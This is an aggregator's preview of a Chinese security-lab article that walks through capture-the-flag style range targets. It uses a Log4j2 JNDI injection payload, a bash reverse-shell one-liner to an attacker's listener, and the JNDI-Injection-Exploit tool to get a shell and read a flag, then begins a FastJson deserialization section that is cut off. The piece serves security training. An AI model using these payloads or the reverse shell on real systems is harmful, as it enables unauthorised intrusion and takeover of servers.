专栏名称: Ms08067安全实验室
“Ms08067安全实验室”致力于网络安全的普及和培训!
目录
相关文章推荐
WWD 国际时尚特讯  ·  焦点 ... ·  2 天前  
LADYMAX  ·  15条要闻 | ... ·  1 周前  
今天看啥  ›  专栏  ›  Ms08067安全实验室

【揭秘一】练武靶场(文末有福利!)

Ms08067安全实验室  · 公众号  ·  · 2024-11-25 16:50
    

文章预览

Taoing “MS08067实验室,专注于网络安全技能培训与服务。" 号外号外,"Ms08067练武场" 最强劲的第一批选手打靶思路来啦。 官网链接 :http://attck.ms08067.com/ Part1 log4j2,⽬标站点:http: //27.25.151.24:29458/hello?payload=111 访问站点后,发现参数payload为可控点后, 对该参数进行黑盒测试 尝试 JNDI注入时 , 语句为:${jndi:dns://teg756.dnslog.cn} 得 到dnslog回显记录, 说 明目标服务器存在JNDI漏洞, 并且可出网 使用JNDI-Injection-Exploit.jar工具生成反弹shell : (反弹语句:bash -i > & /dev/tcp/xx..xx.88/10001 0> & 1) 在攻击机上监听10001端口后, 将JNDI-Exploit生成反弹shell发送给服务器 攻击机 得到目标 bash 获取环境变量得到flag{b423788e-d7b7-4e1abd58-9e73b447d575}     Part2 测试目标:目标站点:http://27.25.151.24:23953/ 漏洞发现:FastJson 反序列化漏洞访问漏洞所在URL后, 服务器返回了数据信息, 并且通过标 ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览